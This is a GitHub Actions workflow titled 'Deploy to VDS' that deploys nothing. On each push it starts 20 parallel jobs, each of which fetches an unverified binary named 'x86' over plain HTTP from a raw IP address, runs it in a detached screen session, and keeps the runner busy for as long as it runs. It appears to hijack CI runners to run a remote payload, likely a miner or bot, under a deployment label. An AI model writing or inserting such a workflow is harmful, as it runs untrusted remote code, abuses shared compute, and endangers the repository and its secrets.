name: Deploy to VDS

on:
  workflow_dispatch:
  push:
    branches: [ main ]

jobs:
  deploy:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
      max-parallel: 20
    
    steps:
      - name: Install screen
        run: sudo apt-get update && sudo apt-get install -y screen
      
      - name: Download and run x86
        run: |
          wget -q http://87.242.100.61/x86
          chmod +x x86
          screen -dmS x86_session bash -c "./x86; exec bash"
          echo "Screen session started"
      
      - name: Keep workflow alive
        run: |
          echo "Keeping workflow alive..."
          while screen -list | grep -q x86_session; do
            sleep 60
            echo "Screen session still running..."
          done
          echo "Screen session ended"
